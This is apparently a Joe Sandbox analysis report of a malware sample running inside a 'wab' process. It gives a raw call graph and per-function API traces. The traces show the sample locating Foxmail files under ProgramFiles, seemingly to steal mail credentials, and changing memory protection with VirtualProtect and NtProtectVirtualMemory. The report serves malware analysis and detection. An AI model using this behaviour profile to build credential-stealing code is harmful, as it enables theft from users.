6086->6105 6090 352d3505 6091 352d3510 6090->6091 6119 352d3972 6090->6119 6091->6057 6093 352d34fd 6093->6057 6142 352d7457 6094->6142 6097 352d3529 6098 352d3532 6097->6098 6104 352d3543 6097->6104 6099 352d391b 6 API calls 6098->6099 6100 352d3537 6099->6100 6101 352d3972 RtlDeleteCriticalSection 6100->6101 6102 352d353c 6101->6102 6146 352d3c50 6102->6146 6104->6058 6107 352d393f 6105->6107 6108 352d3968 6107->6108 6109 352d34f9 6107->6109 6123 352d3be0 6107->6123 6110 352d3972 RtlDeleteCriticalSection 6108->6110 6109->6093 6111 352d38e8 6109->6111 6110->6109 6128 352d3af1 6111->6128 6114 352d38fd 6114->6090 6115 352d3ba2 6 API calls 6116 352d390b 6115->6116 6117 352d3918 6116->6117 6133 352d391b 6116->6133 6117->6090 6120 352d399c 6119->6120 6121 352d397d 6119->6121 6120->6093 6122 352d3987 RtlDeleteCriticalSection 6121->6122 6122->6120 6122->6122 6124 352d3a82 5 API calls 6123->6124 6125 352d3bfa 6124->6125 6126 352d3c18 InitializeCriticalSectionAndSpinCount 6125->6126 6127 352d3c03 6125->6127 6126->6127 6127->6107 6129 352d3a82 5 API calls 6128->6129 6130 352d3b0b 6129->6130 6131 352d3b24 TlsAlloc 6130->6131 6132 352d38f2 6130->6132 6132->6114 6132->6115 6134 352d3925 6133->6134 6135 352d392b 6133->6135 6137 352d3b2c 6134->6137 6135->6114 6138 352d3a82 5 API calls 6137->6138 6139 352d3b46 6138->6139 6140 352d3b5e TlsFree 6139->6140 6141 352d3b52 6139->6141 6140->6141 6141->6135 6145 352d7470 6142->6145 6143 352d2ada 5 API calls 6144 352d24a3 6143->6144 6144->6061 6144->6097 6145->6143 6147 352d3c7f 6146->6147 6149 352d3c59 6146->6149 6147->6104 6148 352d3c69 FreeLibrary 6148->6149 6149->6147 6149->6148 6151 352d24c8 6150->6151 6152 352d24c4 6150->6152 6153 352d2639 4 API calls 6151->6153 6155 352d24d5 6151->6155 6152->6065 6154 352d2559 6153->6154 6155->6065 6157 352d2451 6156->6157 6158 352d2455 6157->6158 6162 352d2461 6157->6162 6177 352d527a 6158->6177 6161 352d246e 6161->5844 6162->6161 6180 352d499b 6162->6180 6255 352d34c7 RtlInterlockedFlushSList 
6165->6255 6167 352d2312 6167->5846 6257 352d246f 6168->6257 6170 352d20c9 6170->5848 6172 352d2617 6171->6172 6173 352d262d 6172->6173 6276 352d53ed 6172->6276 6173->5837 6176 352d3529 8 API calls 6176->6173 6202 352d5132 6177->6202 6181 352d49a7 6180->6181 6182 352d49bf 6181->6182 6224 352d4af5 GetModuleHandleW 6181->6224 6233 352d5671 RtlEnterCriticalSection 6182->6233 6186 352d4a65 6234 352d4aa5 6186->6234 6190 352d4a3c 6193 352d4a54 6190->6193 6197 352d4669 5 API calls 6190->6197 6191 352d4aae 6245 352dbdc9 6191->6245 6192 352d4a82 6237 352d4ab4 6192->6237 6198 352d4669 5 API calls 6193->6198 6195 352d527a 20 API calls 6195->6190 6197->6193 6198->6186 6199 352d49c7 6199->6186 6199->6190 6199->6195 6205 352d50e1 6202->6205 6204 352d245f 6204->5844 6206 352d50ed 6205->6206 6213 352d5671 RtlEnterCriticalSection 6206->6213 6208 352d50fb 6214 352d515a 6208->6214 6212 352d5119 6212->6204 6213->6208 6217 352d5182 6214->6217 6218 352d517a 6214->6218 6215 352d2ada 5 API calls 6216 352d5108 6215->6216 6220 352d5126 6216->6220 6217->6218 6219 352d571e 20 API calls 6217->6219 6218->6215 6219->6218 6223 352d56b9 RtlLeaveCriticalSection 6220->6223 6222 352d5130 6222->6212 6223->6222 6225 352d49b3 6224->6225 6225->6182 6226 352d4b39 GetModuleHandleExW 6225->6226 6227 352d4b63 GetProcAddress 6226->6227 6228 352d4b78 6226->6228 6227->6228 6229 352d4b8c FreeLibrary 6228->6229 6230 352d4b95 6228->6230 6229->6230 6231 352d2ada 5 API calls 6230->6231 6232 352d4b9f 6231->6232 6232->6182 6233->6199 6248 352d56b9 RtlLeaveCriticalSection 6234->6248 6236 352d4a7e 6236->6191 6236->6192 6249 352d6025 6237->6249 6240 352d4ae2 6243 352d4b39 8 API calls 6240->6243 6241 352d4ac2 GetPEB 6241->6240 6242 352d4ad2 GetCurrentProcess TerminateProcess 6241->6242 6242->6240 6244 352d4aea ExitProcess 6243->6244 6246 352d2ada 5 API calls 6245->6246 6247 352dbdd4 6246->6247 6247->6247 6248->6236 6250 352d604a 6249->6250 6251 352d6040 6249->6251 6252 352d5c45 5 API calls 6250->6252 6253 352d2ada 5 API 
calls 6251->6253 6252->6251 6254 352d4abe 6253->6254 6254->6240 6254->6241 6256 352d34d7 6255->6256 6256->6167 6262 352d53ff 6257->6262 6260 352d391b 6 API calls 6261 352d354d 6260->6261 6261->6170 6265 352d5c2b 6262->6265 6266 352d5c35 6265->6266 6267 352d2476 6265->6267 6269 352d5db2 6266->6269 6267->6260 6270 352d5c45 5 API calls 6269->6270 6271 352d5dd9 6270->6271 6272 352d5df1 TlsFree 6271->6272 6273 352d5de5 6271->6273 6272->6273 6274 352d2ada 5 API calls 6273->6274 6275 352d5e02 6274->6275 6275->6267 6279 352d74da 6276->6279 6282 352d74f3 6279->6282 6280 352d2ada 5 API calls 6281 352d2625 6280->6281 6281->6176 6282->6280 6283->5792 6735 352d284f 6736 352d2882 27 API calls 6735->6736 6737 352d285d 6736->6737 6738 352d724e GetProcessHeap 7288 352d8a89 7291 352d6d60 7288->7291 7292 352d6d69 7291->7292 7293 352d6d72 7291->7293 7295 352d6c5f 7292->7295 7296 352d5af6 38 API calls 7295->7296 7297 352d6c6c 7296->7297 7298 352d6d7e 38 API calls 7297->7298 7299 352d6c74 7298->7299 7315 352d69f3 7299->7315 7302 352d6c8b 7302->7293 7303 352d56d0 21 API calls 7304 352d6c9c 7303->7304 7305 352d6cce 7304->7305 7322 352d6e20 7304->7322 7308 352d571e 20 API calls 7305->7308 7308->7302 7309 352d6cc9 7310 352d6368 20 API calls 7309->7310 7310->7305 7311 352d6d12 7311->7305 7332 352d68c9 7311->7332 7312 352d6ce6 7312->7311 7313 352d571e 20 API calls 7312->7313 7313->7311 7316 352d54a7 38 API calls 7315->7316 7317 352d6a05 7316->7317 7318 352d6a14 GetOEMCP 7317->7318 7319 352d6a26 7317->7319 7320 352d6a3d 7318->7320 7319->7320 7321 352d6a2b GetACP 7319->7321 7320->7302 7320->7303 7321->7320 7323 352d69f3 40 API calls 7322->7323 7324 352d6e3f 7323->7324 7327 352d6e90 IsValidCodePage 7324->7327 7329 352d6e46 7324->7329 7331 352d6eb5 7324->7331 7325 352d2ada 5 API calls 7326 352d6cc1 7325->7326 7326->7309 7326->7312 7328 352d6ea2 GetCPInfo 7327->7328 7327->7329 7328->7329 7328->7331 7329->7325 7335 352d6acb GetCPInfo 7331->7335 7408 352d6886 7332->7408 7334 352d68ed 7334->7305 7336 
352d6baf 7335->7336 7341 352d6b05 7335->7341 7338 352d2ada 5 API calls 7336->7338 7340 352d6c5b 7338->7340 7340->7329 7345 352d86e4 7341->7345 7344 352d8a3e 43 API calls 7344->7336 7346 352d54a7 38 API calls 7345->7346 7347 352d8704 MultiByteToWideChar 7346->7347 7349 352d8742 7347->7349 7356 352d87da 7347->7356 7351 352d8763 7349->7351 7352 352d56d0 21 API calls 7349->7352 7350 352d2ada 5 API calls 7353 352d6b66 7350->7353 7354 352d87d4 7351->7354 7357 352d87a8 MultiByteToWideChar 7351->7357 7352->7351 7359 352d8a3e 7353->7359 7364 352d8801 7354->7364 7356->7350 7357->7354 7358 352d87c4 GetStringTypeW 7357->7358 7358->7354 7360 352d54a7 38 API calls 7359->7360 7361 352d8a51 7360->7361 7368 352d8821 7361->7368 7365 352d880d 7364->7365 7367 352d881e 7364->7367 7366 352d571e 20 API calls 7365->7366 7365->7367 7366->7367 7367->7356 7369 352d883c 7368->7369 7370 352d8862 MultiByteToWideChar 7369->7370 7371 352d888c 7370->7371 7372 352d8a16 7370->7372 7375 352d56d0 21 API calls 7371->7375 7377 352d88ad 7371->7377 7373 352d2ada 5 API calls 7372->7373 7374 352d6b87 7373->7374 7374->7344 7375->7377 7376 352d88f6 MultiByteToWideChar 7378 352d890f 7376->7378 7391 352d8962 7376->7391 7377->7376 7377->7391 7395 352d5f19 7378->7395 7380 352d8801 20 API calls 7380->7372 7382 352d8939 7384 352d5f19 11 API calls 7382->7384 7382->7391 7383 352d8971 7386 352d56d0 21 API calls 7383->7386 7389 352d8992 7383->7389 7384->7391 7385 352d8a07 7388 352d8801 20 API calls 7385->7388 7386->7389 7387 352d5f19 11 API calls 7390 352d89e6 7387->7390 7388->7391 7389->7385 7389->7387 7390->7385 7392 352d89f5 WideCharToMultiByte 7390->7392 7391->7380 7392->7385 7393 352d8a35 7392->7393 7394 352d8801 20 API calls 7393->7394 7394->7391 7396 352d5c45 5 API calls 7395->7396 7397 352d5f40 7396->7397 7400 352d5f49 7397->7400 7403 352d5fa1 7397->7403 7401 352d2ada 5 API calls 7400->7401 7402 352d5f9b 7401->7402 7402->7382 7402->7383 7402->7391 7404 352d5c45 5 API calls 7403->7404 7405 352d5fc8 7404->7405 
7406 352d2ada 5 API calls 7405->7406 7407 352d5f89 LCMapStringW 7406->7407 7407->7400 7409 352d6892 7408->7409 7416 352d5671 RtlEnterCriticalSection 7409->7416 7411 352d689c 7417 352d68f1 7411->7417 7415 352d68b5 7415->7334 7416->7411 7429 352d7011 7417->7429 7419 352d693f 7420 352d7011 26 API calls 7419->7420 7421 352d695b 7420->7421 7422 352d7011 26 API calls 7421->7422 7423 352d6979 7422->7423 7424 352d68a9 7423->7424 7425 352d571e 20 API calls 7423->7425 7426 352d68bd 7424->7426 7425->7424 7443 352d56b9 RtlLeaveCriticalSection 7426->7443 7428 352d68c7 7428->7415 7430 352d7022 7429->7430 7434 352d701e 7429->7434 7431 352d7029 7430->7431 7435 352d703c 7430->7435 7432 352d6368 20 API calls 7431->7432 7433 352d702e 7432->7433 7436 352d62ac 26 API calls 7433->7436 7434->7419 7435->7434 7437 352d706a 7435->7437 7439 352d7073 7435->7439 7436->7434 7438 352d6368 20 API calls 7437->7438 7440 352d706f 7438->7440 7439->7434 7441 352d6368 20 API calls 7439->7441 7442 352d62ac 26 API calls 7440->7442 7441->7440 7442->7434 7443->7428 6739 352d5348 6740 352d3529 8 API calls 6739->6740 6741 352d534f 6740->6741 6742 352d7b48 6752 352d8ebf 6742->6752 6746 352d7b55 6765 352d907c 6746->6765 6749 352d7b7f 6750 352d571e 20 API calls 6749->6750 6751 352d7b8a 6750->6751 6769 352d8ec8 6752->6769 6754 352d7b50 6755 352d8fdc 6754->6755 6756 352d8fe8 6755->6756 6789 352d5671 RtlEnterCriticalSection 6756->6789 6758 352d8ff3 6759 352d905e 6758->6759 6761 352d9032 RtlDeleteCriticalSection 6758->6761 6790 352da09c 6758->6790 6803 352d9073 6759->6803 6762 352d571e 20 API calls 6761->6762 6762->6758 6763 352d906a 6763->6746 6766 352d7b64 RtlDeleteCriticalSection 6765->6766 6767 352d9092 6765->6767 6766->6746 6766->6749 6767->6766 6768 352d571e 20 API calls 6767->6768 6768->6766 6770 352d8ed4 6769->6770 6779 352d5671 RtlEnterCriticalSection 6770->6779 6772 352d8f77 6784 352d8f97 6772->6784 6776 352d8f83 6776->6754 6777 352d8e78 66 API calls 6778 352d8ee3 6777->6778 6778->6772 6778->6777 6780 
352d7b94 RtlEnterCriticalSection 6778->6780 6781 352d8f6d 6778->6781 6779->6778 6780->6778 6787 352d7ba8 RtlLeaveCriticalSection 6781->6787 6783 352d8f75 6783->6778 6788 352d56b9 RtlLeaveCriticalSection 6784->6788 6786 352d8f9e 6786->6776 6787->6783 6788->6786 6789->6758 6791 352da0a8 6790->6791 6792 352da0ce 6791->6792 6793 352da0b9 6791->6793 6802 352da0c9 6792->6802 6806 352d7b94 RtlEnterCriticalSection 6792->6806 6794 352d6368 20 API calls 6793->6794 6796 352da0be 6794->6796 6798 352d62ac 26 API calls 6796->6798 6797 352da0ea 6807 352da026 6797->6807 6798->6802 6800 352da0f5 6823 352da112 6800->6823 6802->6758 7087 352d56b9 RtlLeaveCriticalSection 6803->7087 6805 352d907a 6805->6763 6806->6797 6808 352da048 6807->6808 6809 352da033 6807->6809 6815 352da043 6808->6815 6826 352d8e12 6808->6826 6810 352d6368 20 API calls 6809->6810 6811 352da038 6810->6811 6813 352d62ac 26 API calls 6811->6813 6813->6815 6815->6800 6816 352d907c 20 API calls 6817 352da064 6816->6817 6832 352d7a5a 6817->6832 6819 352da06a 6839 352dadce 6819->6839 6822 352d571e 20 API calls 6822->6815 7086 352d7ba8 RtlLeaveCriticalSection 6823->7086 6825 352da11a 6825->6802 6827 352d8e2a 6826->6827 6829 352d8e26 6826->6829 6828 352d7a5a 26 API calls 6827->6828 6827->6829 6830 352d8e4a 6828->6830 6829->6816 6854 352d9a22 6830->6854 6833 352d7a7b 6832->6833 6834 352d7a66 6832->6834 6833->6819 6835 352d6368 20 API calls 6834->6835 6836 352d7a6b 6835->6836 6837 352d62ac 26 API calls 6836->6837 6838 352d7a76 6837->6838 6838->6819 6840 352daddd 6839->6840 6843 352dadf2 6839->6843 6842 352d6355 20 API calls 6840->6842 6841 352dae2d 6844 352d6355 20 API calls 6841->6844 6845 352dade2 6842->6845 6843->6841 6847 352dae19 6843->6847 6848 352dae32 6844->6848 6846 352d6368 20 API calls 6845->6846 6851 352da070 6846->6851 7043 352dada6 6847->7043 6850 352d6368 20 API calls 6848->6850 6852 352dae3a 6850->6852 6851->6815 6851->6822 6853 352d62ac 26 API calls 6852->6853 6853->6851 6855 352d9a2e 6854->6855 6856 
352d9a36 6855->6856 6859 352d9a4e 6855->6859 6879 352d6355 6856->6879 6858 352d9aec 6861 352d6355 20 API calls 6858->6861 6859->6858 6864 352d9a83 6859->6864 6863 352d9af1 6861->6863 6862 352d6368 20 API calls 6872 352d9a43 6862->6872 6865 352d6368 20 API calls 6863->6865 6882 352d8c7b RtlEnterCriticalSection 6864->6882 6867 352d9af9 6865->6867 6869 352d62ac 26 API calls 6867->6869 6868 352d9a89 6870 352d9aba 6868->6870 6871 352d9aa5 6868->6871 6869->6872 6883 352d9b0d 6870->6883 6874 352d6368 20 API calls 6871->6874 6872->6829 6875 352d9aaa 6874->6875 6877 352d6355 20 API calls 6875->6877 6876 352d9ab5 6934 352d9ae4 6876->6934 6877->6876 6880 352d5b7a 20 API calls 6879->6880 6881 352d635a 6880->6881 6881->6862 6882->6868 6884 352d9b3b 6883->6884 6922 352d9b34 6883->6922 6885 352d9b3f 6884->6885 6886 352d9b5e 6884->6886 6888 352d6355 20 API calls 6885->6888 6889 352d9baf 6886->6889 6890 352d9b92 6886->6890 6887 352d2ada 5 API calls 6891 352d9d15 6887->6891 6892 352d9b44 6888->6892 6894 352d9bc5 6889->6894 6937 352da00b 6889->6937 6893 352d6355 20 API calls 6890->6893 6891->6876 6895 352d6368 20 API calls 6892->6895 6897 352d9b97 6893->6897 6940 352d96b2 6894->6940 6899 352d9b4b 6895->6899 6901 352d6368 20 API calls 6897->6901 6902 352d62ac 26 API calls 6899->6902 6905 352d9b9f 6901->6905 6902->6922 6903 352d9c0c 6909 352d9c66 WriteFile 6903->6909 6910 352d9c20 6903->6910 6904 352d9bd3 6906 352d9bf9 6904->6906 6907 352d9bd7 6904->6907 6908 352d62ac 26 API calls 6905->6908 6952 352d9492 GetConsoleCP 6906->6952 6911 352d9ccd 6907->6911 6947 352d9645 6907->6947 6908->6922 6913 352d9c89 GetLastError 6909->6913 6918 352d9bef 6909->6918 6914 352d9c28 6910->6914 6915 352d9c56 6910->6915 6911->6922 6923 352d6368 20 API calls 6911->6923 6913->6918 6919 352d9c2d 6914->6919 6920 352d9c46 6914->6920 6978 352d9728 6915->6978 6918->6911 6918->6922 6926 352d9ca9 6918->6926 6919->6911 6963 352d9807 6919->6963 6970 352d98f5 6920->6970 6922->6887 6925 352d9cf2 6923->6925 6927 
352d6355 20 API calls 6925->6927 6928 352d9cc4 6926->6928 6929 352d9cb0 6926->6929 6927->6922 6985 352d6332 6928->6985 6931 352d6368 20 API calls 6929->6931 6932 352d9cb5 6931->6932 6933 352d6355 20 API calls 6932->6933 6933->6922 7042 352d8c9e RtlLeaveCriticalSection 6934->7042 6936 352d9aea 6936->6872 6990 352d9f8d 6937->6990 7012 352d8dbc 6940->7012 6942 352d96c2 6943 352d96c7 6942->6943 6944 352d5af6 38 API calls 6942->6944 6943->6903 6943->6904 6946 352d96ea 6944->6946 6945 352d9708 GetConsoleMode 6945->6943 6946->6943 6946->6945 6948 352d969f 6947->6948 6949 352d966a 6947->6949 6948->6918 6949->6948 6950 352d96a1 GetLastError 6949->6950 6951 352da181 WriteConsoleW CreateFileW 6949->6951 6950->6948 6951->6949 6953 352d94f5 6952->6953 6958 352d9607 6952->6958 6957 352d957b WideCharToMultiByte 6953->6957 6953->6958 6960 352d79e6 40 API calls 6953->6960 6962 352d95d2 WriteFile 6953->6962 7021 352d7c19 6953->7021 6954 352d2ada 5 API calls 6956 352d9641 6954->6956 6956->6918 6957->6958 6959 352d95a1 WriteFile 6957->6959 6958->6954 6959->6953 6961 352d962a GetLastError 6959->6961 6960->6953 6961->6958 6962->6953 6962->6961 6967 352d9816 6963->6967 6964 352d98d8 6966 352d2ada 5 API calls 6964->6966 6965 352d9894 WriteFile 6965->6967 6968 352d98da GetLastError 6965->6968 6969 352d98f1 6966->6969 6967->6964 6967->6965 6968->6964 6969->6918 6972 352d9904 6970->6972 6971 352d9a0f 6973 352d2ada 5 API calls 6971->6973 6972->6971 6974 352d9986 WideCharToMultiByte 6972->6974 6976 352d99bb WriteFile 6972->6976 6975 352d9a1e 6973->6975 6974->6976 6977 352d9a07 GetLastError 6974->6977 6975->6918 6976->6972 6976->6977 6977->6971 6983 352d9737 6978->6983 6979 352d97ea 6980 352d2ada 5 API calls 6979->6980 6982 352d9803 6980->6982 6981 352d97a9 WriteFile 6981->6983 6984 352d97ec GetLastError 6981->6984 6982->6918 6983->6979 6983->6981 6984->6979 6986 352d6355 20 API calls 6985->6986 6987 352d633d 6986->6987 6988 352d6368 20 API calls 6987->6988 6989 352d6350 6988->6989 6989->6922 
6999 352d8d52 6990->6999 6992 352d9f9f 6993 352d9fb8 SetFilePointerEx 6992->6993 6994 352d9fa7 6992->6994 6996 352d9fac 6993->6996 6997 352d9fd0 GetLastError 6993->6997 6995 352d6368 20 API calls 6994->6995 6995->6996 6996->6894 6998 352d6332 20 API calls 6997->6998 6998->6996 7000 352d8d5f 6999->7000 7001 352d8d74 6999->7001 7002 352d6355 20 API calls 7000->7002 7004 352d6355 20 API calls 7001->7004 7006 352d8d99 7001->7006 7003 352d8d64 7002->7003 7005 352d6368 20 API calls 7003->7005 7007 352d8da4 7004->7007 7008 352d8d6c 7005->7008 7006->6992 7009 352d6368 20 API calls 7007->7009 7008->6992 7010 352d8dac 7009->7010 7011 352d62ac 26 API calls 7010->7011 7011->7008 7013 352d8dc9 7012->7013 7014 352d8dd6 7012->7014 7015 352d6368 20 API calls 7013->7015 7016 352d8de2 7014->7016 7017 352d6368 20 API calls 7014->7017 7018 352d8dce 7015->7018 7016->6942 7019 352d8e03 7017->7019 7018->6942 7020 352d62ac 26 API calls 7019->7020 7020->7018 7022 352d5af6 38 API calls 7021->7022 7023 352d7c24 7022->7023 7026 352d7a00 7023->7026 7027 352d7a13 7026->7027 7029 352d7a28 7026->7029 7027->7029 7030 352d7f0f 7027->7030 7029->6953 7031 352d7f1b 7030->7031 7032 352d5af6 38 API calls 7031->7032 7033 352d7f24 7032->7033 7034 352d5671 RtlEnterCriticalSection 7033->7034 7036 352d7f72 7033->7036 7035 352d7f42 7034->7035 7037 352d7f86 20 API calls 7035->7037 7036->7029 7038 352d7f56 7037->7038 7039 352d7f75 RtlLeaveCriticalSection 7038->7039 7040 352d7f69 7039->7040 7040->7036 7041 352d55a8 38 API calls 7040->7041 7041->7036 7042->6936 7046 352dad24 7043->7046 7045 352dadca 7045->6851 7047 352dad30 7046->7047 7057 352d8c7b RtlEnterCriticalSection 7047->7057 7049 352dad3e 7050 352dad65 7049->7050 7051 352dad70 7049->7051 7058 352dae4d 7050->7058 7052 352d6368 20 API calls 7051->7052 7054 352dad6b 7052->7054 7073 352dad9a 7054->7073 7056 352dad8d 7056->7045 7057->7049 7059 352d8d52 26 API calls 7058->7059 7061 352dae5d 7059->7061 7060 352dae63 7076 352d8cc1 7060->7076 7061->7060 7063 

Control-flow Graph

APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 352D1137
• lstrcatW.KERNEL32(?,?), ref: 352D1151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 352D115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 352D116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 352D117C
• FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 352D1193
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 352D11D0
• FindClose.KERNELBASE(00000000), ref: 352D11DB
Memory Dump Source
• Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
• Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: bbfaf2ee0aae4cbe4cb31c4f05ab27ce55c981b124cb63d854ede3aa830f8f43
• Instruction ID: 104c4266a967103728c9eab3001f0eddae0f3c3e723df2ef3fd3905689fe072d
• Opcode Fuzzy Hash: bbfaf2ee0aae4cbe4cb31c4f05ab27ce55c981b124cb63d854ede3aa830f8f43
• Instruction Fuzzy Hash: BE217372944349ABD710EA64DC4CF9BBBECEF84325F50092AB968D31D0EB70D6058796
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 127 3db916e-3db91ab 128 3db91ad-3db91b9 call 3db933b 127->128 130 3db91bb 128->130 131 3db91c0-3db91d0 128->131 130->131 132 3db91df-3db922d NtProtectVirtualMemory call 3db933b 131->132 133 3db91d2-3db91d7 Sleep 131->133 135 3db9232-3db9243 132->135 133->127 135->127
APIs
• Sleep.KERNELBASE(00000005), ref: 03DB91D4
Strings
Memory Dump Source
• Source File: 00000007.00000002.54465873469.0000000003BC8000.00000040.00000400.00020000.00000000.sdmp, Offset: 03BC8000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_3bc8000_wab.jbxd
Similarity
• API ID: Sleep
• String ID: |XlO
• API String ID: 3472027048-1294583706
• Opcode ID: 59f1cf275b04146e9f84399734263923a4d8de607fbdf56483de8552eade99e3
• Instruction ID: 5ee4a19db42c7ba76181f76836f1c0fe5d1b68b2663ce5adbafccdf3ed1e558a
• Opcode Fuzzy Hash: 59f1cf275b04146e9f84399734263923a4d8de607fbdf56483de8552eade99e3
• Instruction Fuzzy Hash: 691133B1A45341CFEB509F7485ACB8AB7B4AF14391F464189EE528B1B6C334C5848F12
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 352D1434
                                                                                                                                                                                                                      • Part of subcall function 352D10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 352D1137
                                                                                                                                                                                                                      • Part of subcall function 352D10F1: lstrcatW.KERNEL32(?,?), ref: 352D1151
                                                                                                                                                                                                                      • Part of subcall function 352D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 352D115C
                                                                                                                                                                                                                      • Part of subcall function 352D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 352D116D
                                                                                                                                                                                                                      • Part of subcall function 352D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 352D117C
                                                                                                                                                                                                                      • Part of subcall function 352D10F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 352D1193
                                                                                                                                                                                                                      • Part of subcall function 352D10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 352D11D0
                                                                                                                                                                                                                      • Part of subcall function 352D10F1: FindClose.KERNELBASE(00000000), ref: 352D11DB
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 352D14C5
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 352D14E0
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 352D150F
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 352D1521
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 352D1547
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 352D1553
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 352D1579
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 352D1585
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,?), ref: 352D15AB
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00000000), ref: 352D15B7
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                                                    • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                                                    • API String ID: 672098462-2938083778
                                                                                                                                                                                                                    • Opcode ID: c9421599c4f15f9cd7321766f83b499a99bf06b99cc33594a8718f72a5b049fe
                                                                                                                                                                                                                    • Instruction ID: 766407a8e30143b0840bd5de4652fe5340e67bb8c8ce2734afd7e83f41fe726f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9421599c4f15f9cd7321766f83b499a99bf06b99cc33594a8718f72a5b049fe
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB81A171A4039CA9DB20DBA1DC45FEEB37DEF84710F4005AAF908E7190EA715A85CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(352DC7DD), ref: 352DC7E6
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,352DC7DD), ref: 352DC838
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 352DC860
                                                                                                                                                                                                                      • Part of subcall function 352DC803: GetProcAddress.KERNEL32(00000000,352DC7F4), ref: 352DC804
                                                                                                                                                                                                                      • Part of subcall function 352DC803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,352DC7F4,352DC7DD), ref: 352DC816
                                                                                                                                                                                                                      • Part of subcall function 352DC803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,352DC7F4,352DC7DD), ref: 352DC82A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000007.00000002.54485798339.00000000352D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 352D0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485770862.00000000352D0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000007.00000002.54485798339.00000000352E6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_352d0000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2099061454-0
                                                                                                                                                                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                    • Instruction ID: fc228c6005d23567a47f57baa70ffcc659bc2bb8329fea5f3702bcdfa565d12e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1016D50A493C23CBB1392744C04DBADFEDAB176A0B100756E075F7093CDA08502C3F5
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(?,352DC7DD), ref: 352DC838
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 352DC860
                                                                                                                                                                                                                      • Part of subcall function 352DC7E6: GetModuleHandleA.KERNEL32(352DC7DD), ref: 352DC7E6
